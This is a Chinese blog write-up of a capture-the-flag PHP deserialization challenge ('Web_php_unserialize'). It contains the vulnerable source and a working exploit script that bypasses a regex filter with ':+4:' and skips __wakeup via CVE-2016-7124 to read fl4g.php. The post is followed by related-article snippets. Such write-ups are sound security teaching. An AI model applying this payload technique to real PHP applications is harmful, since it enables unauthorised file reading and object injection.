【攻防世界】十五 --- Web_php_unserialize --- php反序列化

已于 2022-07-28 07:33:18 修改
阅读量251 收藏
点赞数
分类专栏: 攻防世界 文章标签: ctf 网络安全
于 2020-12-28 17:29:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43168364/article/details/111870241
版权

题目 — Web_php_unserialize

一、writeup

根据提示是一道php反序列化的题,主页拿到代码进行审计

 <?php 
class Demo { 
    private $file = 'index.php';

    // 一个构造函数
    public function __construct($file) { 
        $this->file = $file; 
    }

    // 一个析构函数
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }

    // 反序列化时执行的函数 让 $this -> file = 'index.php'
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}

// 通过GET方式去除 var 变量
if (isset($_GET['var'])) { 

	// 对其进行 base64 解码
    $var = base64_decode($_GET['var']); 

    // 正则表达式过滤
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
    	// 反序列化传入的变量
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

关键点:

  • flag在fl4g.php文件中
  • 需要绕过正则表达式的过滤
  • 需要绕过__wakeup()方法

思路很明确了,编写如下所示的代码

<?php
class Demo { 
    private $file = 'index.php';

    // 一个构造函数
    public function __construct($file) { 
        $this->file = $file; 
    }

    // 一个析构函数
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }

    // 反序列化时执行的函数 让 $this -> file = 'index.php',这里需要绕过
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}

// 实例化Demo类,传入 fl4g.php 参数
$a = new Demo('fl4g.php');

// 序列化
$a = serialize($a);
echo $a;
echo "<br />";

// 绕过正则的过滤
$a = str_replace(":4:", ":+4:", $a);
echo $a;
echo "<br />";


// 利用CVE-2016-7124漏洞让__wakeup()函数不执行
$a = str_replace(":1:",":2:", $a);
echo $a;
echo "<br />";


// 进行base64编码
$a = base64_encode($a);
echo $a;
echo "<br />";
?>

运行结果如下图所示
在这里插入图片描述
传参得到flag
在这里插入图片描述

二、知识点

  • 正则表达式的绕过
  • __wakeup 方法的绕过
  • php代码审计
通地塔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反序列化渗透与攻防(一)之PHP反序列化漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-12 546
序列化和反序列化几乎是工程师们每天都要面对的事情,但是要精确掌握这两个概念并不容易:一方面,它们往往作为框架的一部分出现而湮没在框架之中;另一方面,它们会以其他更容易理解的概念出现,例如加密、持久化。然而,序列化和反序列化的选型却是系统设计或重构一个重要的环节,在分布式、大数据量系统设计里面更为显著。恰当的序列化协议不仅可以提高系统的通用性、强健性、安全性、优化系统性能,而且会让系统更加易于调试、便于扩展。
攻防世界】十二 --- unserialize3 --- php反序列化
qq_43168364的博客
12-25 468
题目 — unserialize3 一、writeup 一道php反序列化的题 关键点: 当审出存在反序列化漏洞时,我们将对应的那个类拿出到自己的php环境中,先用恶意字符串实例化该类然后用serialize()函数,进行序列化,将序列化好的东西抛出到环境中即可造成反序列化漏洞 当$flag='111’是可以看到flag,通过?code查询字符串来传入需要反序列化的字符串 反序列时会自动调用__wakeup() 函数,导致程序结束执行,因此要绕过 __wakeup() 函数(绕过的方法在知识点中有介绍)
攻防世界 Web_php_unserialize 反序列化
trytowritecode的博客
10-24 349
昨天帮忙打了场比赛,web题目里也是有反序列化的题,也是利用魔术方法的调用来构造pop链,获取flag但那道题好绕我不会写,然后还有关于json的题,就发现自己好多都没学,真的打一场比赛容易把自己人都打傻掉。 这道题也是看了好久才明白的题目。 废话不多直接上代码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file =
攻防世界unseping (反序列化与Linux bash shell)
最新发布
2302_79800344的博客
04-01 1106
【代码】【攻防世界unseping (反序列化与Linux bash shell)
攻防世界反序列化 Web_php_unserialize
zxnimud5的专栏
09-14 499
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { .
PHP反序列化-unserialize3(攻防世界
Curry197的博客
05-31 625
题目: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 解题思路: wakeup()函数是在对象被反序列化之后被调用 但是这题如果这个函数被调用,那么程序就退出了,所以需要想办法绕过这个函数。 绕过wakeup函数执行 wakeup()有个执行漏洞:一个字符串或对象被序列化后,如果其属性被修改,则不会执行wakeup()函数,这算是一个绕过点 只要序
第37天:WEB漏洞-反序列化PHP&JAVA全解(上)1
08-03
WEB漏洞-反序列化PHP&JAVA全解(上) 在 WEB 应用程序中,反序列化是一种常见的漏洞,攻击者可以通过反序列化来控制代码执行、SQL 注入、目录遍历等不可控后果。在 PHP 和 JAVA 中,反序列化漏洞尤其常见,本文将...
php-serializer:用于快速操作大型序列化数组的库
06-22
好吧,为这样一个简单的操作反序列化整个数组是非常低效的。 如果您正在反序列化一个小数组或者您不经常这样做,那么这可能没问题,但如果您处于重负载设置中,则必须有更好的方法。 PHPSerializer 背后的想法本质...
tsqlphpunserialize:在 T-SQL 中反序列化 PHP 序列化数据
06-13
tsqlphpunserialize 在 T-SQL 中反序列化 PHP 序列化数据最初发布在 Stack Exchange 上: : noredirect=1# 我正在尝试从 Magento 订单中提取礼品卡代码。 其他一些代码使用 Magento API 从 Magento 检索订单信息作为...
var-exporter:VarExporter组件允许将任何可序列化PHP数据结构导出为纯PHP代码。 这样做时,它保留了与PHP的序列化机制(__wakeup,__ sleep,Serializable)相关的所有语义。
02-05
VarExporter组件VarExporter组件允许将任何可序列化PHP数据结构导出为纯PHP代码。 虽然这样做,它保留了与PHP的序列化机制(相关联的所有语义__wakeup , __sleep , Serializable , __serialize , __unserialize ...
信息安全_数据安全_9_ZN2018_WV_-_PHP_unserialize.pdf
08-21
信息安全_数据安全_9_ZN2018_WV_-_PHP_unserialize 安全测试 数据分析 可信编译 水坑攻击 安全设计
攻防世界——Web——Web_php_unserialize
慎铭的博客
02-22 715
题目源代码如下。 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup
Web_php_unserialize
怪味巧克力的博客
05-25 3355
前言: 看到好的知识点就喜欢记录下来,一是为了方便自己以后复习,二是也能帮助大家了解知识点 知识点: 1、__construct():当对象创建(new)时会自动调用。但在 unserialize() 时是不会自动调用的。(构造函数) 2、__destruct():当对象被销毁时会自动调用。(析构函数) 3、__wakeup():unserialize() 时会自动调用 。 首先拿到题目看到给出一段PHP源码 <?php class Demo { private $file = 'inde
攻防世界】十三、Web_php_unserialize
Hi~ 土拨鼠
09-09 188
步骤 首先打开题目,发现给了一段源码: 分析源码,发现类里面有三个魔术方法: __construct():构造函数,对类的变量进行初始化,创建时自动调用,用得到的参数覆盖$file __destruct():销毁时调用,会显示文件的代码,这里要显示fl4g.php __wakeup():在进行反序列化之前会调用,会把$file重置成index.php 正则表达式的含义:o或c开头,冒号,一个或多个数字,不区分大小写 ok,分析完毕:我们要将序列化后的字符串进行base64加密之后进行get传参到va.
攻防世界Web_php_unserializeweb进阶)
my_name_is_sy的博客
06-29 418
考点: 1、构造函数与析构函数和__wekeup魔术方法。 2、php如何进行序列化与反序列化的方法。 3、序列化私有变量时的一些细节
攻防世界Web_php_unserialize(超详细WP)
金 帛的博客
03-02 3191
攻防世界WP
攻防世界unserialize3题解
黑锤的博客
08-14 6143
unserialize3 看题目就知道这是一道反序列化问题,之前也遇到过,也深入理解过,但时间隔了这么久,难免会有些忘记,通过这道题来再次深入序列化与反序列化的问题。 0x00:那么到底什么是序列化,反序列化呢? 先来讲一点为什么要用序列化呢?他到底好在哪里呢?php序列化是为了什么呢? 当然有一点都知道就是为了传输数据更加方便(这种压缩格式化储存当然在数据传输方面更加简单方便),我们把一...
攻防世界——ctf php反序列化
qq_43409582的博客
06-03 3028
php反序列化学习 今天的做了个反序列化CTF题,先拜读大佬们的文章弄懂了啥叫反序列化: serialize:序列化 unserialize反序列化 简单解释: serialize 把一个对象转成字符串形式, 可以用于保存 unserialize 把serialize序列化后的字符串变成一个对象 详细的请看:(CVE-2016-7124 https://bugs.php.net/bug.ph...
攻防世界web_php_unserialize
06-28
### 回答1: 攻防世界web_php_unserialize是一个关于PHP反序列化漏洞的题目,需要掌握PHP反序列化漏洞的原理和利用方法。在这个题目中,可能会给出一个序列化的字符串,需要将其反序列化并进行一些操作,最终达到获取flag的目的。这个题目需要掌握PHP的序列化和反序列化函数,以及对序列化字符串的解析能力。 ### 回答2: web_php_unserialize指的是PHP反序列化漏洞。序列化是指将对象转换为字节流的过程,反序列化则是将字节流还原为原始对象的过程。PHP序列化对于数据的传输和存储非常方便,但是如果在执行反序列化过程中存在漏洞,就会导致恶意攻击者能够注入恶意代码,并可能导致代码执行、文件读写、远程代码执行等危险后果。攻防世界中的web_php_unserialize比赛就是通过挖掘实际漏洞并利用它们对目标进行攻击的比赛。 攻防世界中的web_php_unserialize比赛通常会考查参赛者对PHP反序列化漏洞的深入理解和实际应用能力。比赛中的攻击场景可能会包括以下几个方面: 1. 对序列化字符串的解析和理解。参赛者需要清楚地知道序列化字符串中不同数据类型的表示方法,包括字符串、数组、对象等。 2. 对序列化字符串中的数据类型和值进行篡改。恶意攻击者通常会利用序列化字符串的可篡改性注入恶意代码或者修改重要数据,参赛者需要在比赛中证明自己能够精准地修改序列化字符串中的数据类型和值。 3. 对反序列化函数的使用和理解。PHP反序列化漏洞很多都是由于对反序列化函数的不当使用导致的。参赛者需要清楚地知道反序列化函数参数的含义以及如何正确使用反序列化函数。 4. 对代码的理解和审计。比赛中可能会给出一些被漏洞的代码,参赛者需要仔细地审计代码并找出漏洞的具体原因。 总的来说,攻防世界中的web_php_unserialize比赛旨在锻炼参赛者的漏洞挖掘和漏洞利用能力,并通过挖掘实际漏洞来理解和掌握漏洞的本质和原理。 ### 回答3: 攻防世界web_php_unserialize是一种基于PHP反序列化漏洞的CTF题目。这个题目主要考察选手对于PHP反序列化漏洞的理解和应用能力。 在一般的PHP应用程序中,序列化是将一个对象或一组数据转换成一个数据流的过程,反序列化则是将这个数据流转回成对象或一组数据。反序列化漏洞是指当应用程序在反序列化过程中没有对数据流进行足够的验证和过滤,导致攻击者可以在数据流中注入恶意代码,以此来执行代码并最终造成攻击。这种漏洞在很多PHP应用程序中都存在,而攻防世界web_php_unserialize就是基于这个漏洞设计的一道CTF题目。 这个题目的主要思路是通过构造一个特定的序列化数据,并将其作为参数提交给目标站点。该序列化数据包含了一个恶意代码,在反序列化时可以执行恶意代码,从而完成攻击。选手需要先了解序列化和反序列化的原理,然后使用PHP代码构造一个带有恶意代码的序列化数据,成功利用反序列化漏洞执行代码并获取到flag。 这道题目对于选手的PHP语言理解和代码能力有一定的要求,同时也需要选手在考虑漏洞时具备一定的克制能力,对于数据的过滤和验证也需要有一定的认识。通过挑战攻防世界web_php_unserialize,选手可以深入了解PHP反序列化漏洞的原理和应用,有效提高自己的防御意识和CTF能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值